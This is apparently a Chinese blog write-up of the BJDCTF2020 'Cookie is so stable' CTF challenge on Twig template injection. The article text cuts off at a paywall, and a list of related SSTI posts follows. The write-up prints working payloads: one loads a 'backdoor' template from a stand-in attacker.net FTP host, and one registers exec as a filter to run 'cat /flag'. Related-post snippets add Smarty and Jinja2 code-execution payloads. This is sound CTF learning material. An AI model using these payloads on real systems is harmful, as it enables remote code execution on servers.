[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入

最新推荐文章于 2025-03-07 22:36:51 发布

原创

最新推荐文章于 2025-03-07 22:36:51 发布 · 799 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #php

本文详细介绍了PHP-Twig模板引擎中的安全漏洞，特别是如何利用Self.env属性进行远程文件包含和任意函数调用。通过注册回调函数和过滤器，可以实现命令执行。文中提供了解题思路和payload示例，并探讨了可能的利用方式，如文件包含和触发XSS。

[BJDCTF2020]Cookie is so stable

PHP-Twig模板注入

参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933

通过_self我们可以调用环境变量中的env属性，当PHP打开远程加载文件的参数(allow_url_include)时，问我们可以通过它来实现远程文件包含

{
  
  {_self.env.setCache("ftp://attacker.net:2121")}}{
  
  {_self.env.loadTemplate("backdoor")}}

利用getFilter函数中的危险函数call_user_func，我们可以实现任意函数调用

{
  
  {_self.env.registerUndefinedFilterCallback("exec")}}{
  
  {_self.env.getFilter("cat /flag")}}
// 前半段的含义为将`exec`注册为回调函数，后半段为回调参数

源码为

public function getFilter($name)
  {
   
   
    ...
    // 遍历回调函数，以$name为参数
    foreach ($this->filterCallbacks as

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

車鈊

关注关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

PHP中的SSTI模板注入——Twig、Smarty、Blade

m0_61506558的博客

10-13

2246

最近接触到了SSTI注入的考点，里面涉及的内容比较杂，和SQL注入一样，影响的面较广，打算先从PHP模块注入开始，一步步深入学习。（一）TwigTwig是来自于Symfony的模版引擎，它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板，以及一个环境变量environment(Twig_Environment) 来存储配置信息。

[BJDCTF2020]Cookie is so stable（ssti模板注入从0到1学习笔记）

姜小孩的博客

03-31

2032

ssti模板注入从0到1 [BJDCTF2020]Cookie is so stable buu

1 条评论您还未登录，请先登录后发表或查看评论

1 条评论

我爱人工智能 2021.07.27
原创不易！期待大佬回访！

BUUCTF 23

qq_52431855的博客

02-05

576

知识点 jinja2 jinja2是Flask作者开发的一个模板系统，起初是仿django模板的一个模板引擎，为Flask提供模板支持，由于其灵活，快速和安全等优点被广泛使用。 Twig Twig是一款灵活、快速、安全的PHP模板引擎。 23-1[BJDCTF2020]Cookie is so stable 做题思路首先打开靶机之后有个提示，对我没用然后打开 flag ，问我什么名字，输入之后，显示的是输入的值，怀疑这里有注入尝试一下，发现是模板注入输入 {{7*7}...

[BJDCTF2020]Cookie is so stable 1(twig模板注入）

weixin_45577185的博客

09-06

467

详解模板注入漏洞关于SSTI注入的一些理解抓个包：发现了两个包在cookie上的不同判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释：如果不抓包在页面是无法获得flag的，应该有过滤 ...

模板注入（Twig）

2401_88743143的博客

03-07

1442

为了使用户界面与业务数据（内容）分离而产生的,模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，再放到渲染函数里，生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙箱逃逸技术来进行绕过。

Twing模板注入 [BJDCTF2020]Cookie is so stable1

m0_75178803的博客

02-28

666

打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}}，返回49表示是 Twig 模块输入{{7*‘7’}}，返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。

关于Twig

aetlypdlg_ys的博客

05-06

363

简单介绍下Twig sstiSSTI，即服务器端模板注入（Server-Side Template Injection）常见的注入有：SQL 注入，XSS 注入，XPATH 注入，XML 注入，代码注入，命令注入等等。sql注入已经出世很多年了，对于sql注入的概念和原理很多人应该是相当清楚了，SSTI也是注入类的漏洞，其成因其实是可以类比于sql注入的。sql注入的成因是从用户获得一个输入后，经过后端脚本语言进行数据库查询，这时我们就可以构造输入语句来进行拼接，从而实现我们想要的sql语句。

以Twig模板为例浅学一手SSTI

蚁景网安学院

12-17

1538

什么是SSTISSTI：开局一张图，姿势全靠ySSTI，即服务器端模板注入（Server-Side Template Injection）常见的注入有：SQL 注入，XSS 注入，XPAT...

SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable

qq_58970968的博客

07-23

1430

config是Flask模版中的一个全局对象，它代表“当前配置对象(flask.config)”，它是一个类字典的对象，它包含了所有应用程序的配置值。当在服务端接收了用户的恶意输入以后，未经任何处理就将其作为Web应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell等问题.使用{{7*'7'}}还是回显49，看来是Twig；在flag界面输入{{7*7}}{{7*‘7’}}输出49。...

2021-07-20 [BJDCTF2020]Cookie is so stable 知识点：SSTI Twig Cookie注入

m0_51326092的博客

07-20

425

** [BJDCTF2020]Cookie is so stable ** ** 前言： ** 不得不说又是膜拜众大佬的一天，题目对于萌新来说实在是难啊，只能搜寻wp加了解知识点边学边做了o(╥﹏╥)o BUU实现题目复现，尽管题目写着cookie，但是重点却不是这￣□￣｜｜。知识点：SSTI（Twig），cookie注入 ** 前置知识： ** 主要就是需要了解SSTI，具体解决Twig的。附上大佬的链接，以下两篇文章都比较详细的讲了不同类型的SSTI，讲的是针不搓！一篇文章带你理解漏洞之SSTI

SSTI注入————php的SSTI

wwwwyyyrre的博客

06-04

1637

SSTI和SQL注入原理差不多，都是因为对输入的字符串控制不足，把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎，主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容提供关于ssti注入的题在题中理解涉及的内容较多这里提供一个大佬讲解的ssti的详细内容。

服务端模版注入漏洞检测payload整理

weixin_30528371的博客

04-07

423

服务端模版注入漏洞产生的根源是将用户输入的数据被模版引擎解析渲染可能导致代码执行漏洞下表涵盖了java,php,python,javascript语言中可能使用到的模版引擎，如果网站存在服务端模版注入在能回显的情况下会将验证栏的数据当模版执行，利用引擎提供的功能进行了计算大部分执行结果都会变成1522756。模版引擎语言验证代码执行盲检测 ...

SSTI相关总结 (smarty/twig)

桃雾雨Rain的博客

01-30

1113

SSTI在用户可控的地方可能发生。一、PHP smarty注入 smarty是php的一个模板引擎。更明确的来说，它可以帮助开发者更好的分离程序逻辑和页面显示。这里略过一些罗嗦的smarty的介绍。 *payload (1) 获取smarty版本号： {$smarty.version} (2) 执行php代码 {php}echo `id`;{/php} //注意这个在3.x版本的时候就已经废弃了 (3) getshell {Smarty_Internal_Write_File::writ

模板注入总结(SSTI)

qq_44657899的博客

02-14

5869

a. 获取变量[]所属的类名 {{[].__class__}} b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}} 没有内置的os模块的类目录查询 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("

Twig 扩展库教程

gitblog_00470的博客

09-12

320

**Twig 扩展库** 是一个已废弃但曾广泛使用的PHP扩展包，用于提供对[Twig模板引擎](http://twig.sensiolabs.org/)的额外功能支持。这些功能不直接内置于Twig的核心中，却能够为开发者带来便利。尽管此项目不再维护且建议转向Twig核心提供的额外扩展或特定的第三方解决方案，如Symfony的组件，但在很多遗留项目中仍可能发现它的身影。 ## 项目快速启动快...

CTF笔记 SSTI模板注入

qq_51248658的博客

10-21

1159

这次只是简单的把以前写的题目进行了总结，大致明白了解题步骤，但还是得多积累一些payload，以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习，感觉那上面挺全的。

SSTI模板注入

石页

04-03

4401

SSTI模板注入探测识别利用探测使用${{<%[%'"}}%\测试，如引发异常，说明可能存在模板注入。识别 PHP模板 Smarty Twig Python模板 Mako jinja2 利用

渗透测试练习题解析 4（CTF web）

于高山之巅，方见大河奔涌；于群峰之上，更觉长风浩荡。

02-18

2077

这个其实挺难想到的，开始我也没想到，看了大佬 wp 才知道，因为前面有个地方干扰到我了，这一串我前面试了很多又是解码又是转图片转文件都没解出来，我以为这个位置的数据没什么用，导致后面没去理这块地方（没猜错的话应该是这个熊猫图的编码，不过不知道为什么转码转不出来）来查看当前目录所有文件名，但是 scandir('.') 包含参数了，不符合条件，所以需要使用别的函数来替代。），使其满足三个 if 条件中的一个，从而执行 $flag 得到 flag，而不是说要绕过三个 if ，去执行最后一行代码，这是不现实的。

Mac中Twig模版安装与SSTI漏洞学习

2302_81156108的博客

09-11

1648

学习SSTI的一些列心得体会，望对大家有用。

jmreport/loadTableData SSTI模板注入